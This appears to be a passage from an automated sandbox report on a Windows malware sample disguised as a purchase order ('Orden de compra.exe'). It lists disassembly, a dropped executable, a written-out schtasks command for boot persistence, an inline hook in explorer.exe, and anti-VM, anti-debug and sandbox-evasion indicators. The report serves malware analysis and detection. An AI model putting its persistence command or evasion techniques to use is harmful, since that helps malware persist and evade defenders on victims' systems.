          Source: C:\Users\user\Desktop\Orden de compra.exeCode function: 0_2_00047091 push ebx; retf 0_2_00047092
          Source: C:\Users\user\Desktop\Orden de compra.exeCode function: 0_2_05774856 push edx; iretd 0_2_05774857
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041D075 push eax; ret 4_2_0041D0C8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040E829 push ss; ret 4_2_0040E82B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041D0C2 push eax; ret 4_2_0041D0C8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041D0CB push eax; ret 4_2_0041D132
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041D12C push eax; ret 4_2_0041D132
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041719A push ebp; ret 4_2_0041719B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00416B67 push FFFFFF90h; ret 4_2_00416B76
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00403BC4 push es; iretd 4_2_00403BCA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00416C7A push ebp; retf 4_2_00416C85
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041BCAA push ecx; retf 4_2_0041BCAC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00406E46 push eax; iretd 4_2_00406E4F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00416690 push es; iretd 4_2_00416691
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00416757 push ebx; retf 4_2_00416758
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0100D0D1 push ecx; ret 4_2_0100D0E4
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AAD0D1 push ecx; ret 8_2_04AAD0E4
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005AD075 push eax; ret 8_2_005AD0C8
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_0059E829 push ss; ret 8_2_0059E82B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005AD0CB push eax; ret 8_2_005AD132
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005AD0C2 push eax; ret 8_2_005AD0C8
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005AD12C push eax; ret 8_2_005AD132
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005A719A push ebp; ret 8_2_005A719B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005A6B67 push FFFFFF90h; ret 8_2_005A6B76
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_00593BC4 push es; iretd 8_2_00593BCA
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005A6C7A push ebp; retf 8_2_005A6C85
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005ABCAA push ecx; retf 8_2_005ABCAC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_00596E46 push eax; iretd 8_2_00596E4F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005A6690 push es; iretd 8_2_005A6691
          Source: initial sampleStatic PE information: section name: .text entropy: 7.2539255088
          Source: initial sampleStatic PE information: section name: .text entropy: 7.2539255088
          Source: C:\Users\user\Desktop\Orden de compra.exeFile created: C:\Users\user\AppData\Roaming\HPQeEdeqeuYypt.exeJump to dropped file

          Boot Survival:

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HPQeEdeqeuYypt' /XML 'C:\Users\user\AppData\Local\Temp\tmp97AC.tmp'

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xE2
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000000.00000002.342930784.0000000002481000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.343034095.00000000024DB000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Orden de compra.exe PID: 6460, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: Orden de compra.exe, 00000000.00000002.342930784.0000000002481000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: Orden de compra.exe, 00000000.00000002.342930784.0000000002481000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exeRDTSC instruction interceptor: First address: 00000000005998E4 second address: 00000000005998EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exeRDTSC instruction interceptor: First address: 0000000000599B4E second address: 0000000000599B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Orden de compra.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00409A80 rdtsc 4_2_00409A80
          Source: C:\Users\user\Desktop\Orden de compra.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exe TID: 6456Thread sleep time: -54657s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra.exe TID: 2524Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6348Thread sleep count: 31 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 6348Thread sleep time: -62000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exe TID: 7008Thread sleep time: -44000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wscript.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wscript.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: explorer.exe, 00000005.00000000.367465423.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.367438434.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: Orden de compra.exe, 00000000.00000002.342930784.0000000002481000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000002.607624484.0000000006408000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.359912940.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: Orden de compra.exe, 00000000.00000002.342930784.0000000002481000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: Orden de compra.exe, 00000000.00000002.342930784.0000000002481000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II|update users set password = @password where user_id = @user_id
          Source: explorer.exe, 00000005.00000000.367438434.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000002.607624484.0000000006408000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000002.607426206.00000000062E0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
          Source: explorer.exe, 00000005.00000000.367290968.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000005.00000000.359912940.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.359912940.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.367290968.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.367465423.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: Orden de compra.exe, 00000000.00000002.342930784.0000000002481000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000005.00000000.359912940.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 00000005.00000002.593861267.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\Orden de compra.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00409A80 rdtsc 4_2_00409A80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040ACC0 LdrLoadDll,4_2_0040ACC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FB58EC mov eax, dword ptr fs:[00000030h]4_2_00FB58EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FB40E1 mov eax, dword ptr fs:[00000030h]4_2_00FB40E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FB40E1 mov eax, dword ptr fs:[00000030h]4_2_00FB40E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FB40E1 mov eax, dword ptr fs:[00000030h]4_2_00FB40E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FEF0BF mov ecx, dword ptr fs:[00000030h]4_2_00FEF0BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FEF0BF mov eax, dword ptr fs:[00000030h]4_2_00FEF0BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FEF0BF mov eax, dword ptr fs:[00000030h]4_2_00FEF0BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF90AF mov eax, dword ptr fs:[00000030h]4_2_00FF90AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FE20A0 mov eax, dword ptr fs:[00000030h]4_2_00FE20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FE20A0 mov eax, dword ptr fs:[00000030h]4_2_00FE20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FE20A0 mov eax, dword ptr fs:[00000030h]4_2_00FE20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FE20A0 mov eax, dword ptr fs:[00000030h]4_2_00FE20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FE20A0 mov eax, dword ptr fs:[00000030h]4_2_00FE20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FE20A0 mov eax, dword ptr fs:[00000030h]4_2_00FE20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FB9080 mov eax, dword ptr fs:[00000030h]4_2_00FB9080
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_010369A6 mov eax, dword ptr fs:[00000030h]4_2_010369A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FD0050 mov eax, dword ptr fs:[00000030h]4_2_00FD0050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FD0050 mov eax, dword ptr fs:[00000030h]4_2_00FD0050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_010351BE mov eax, dword ptr fs:[00000030h]4_2_010351BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_010351BE mov eax, dword ptr fs:[00000030h]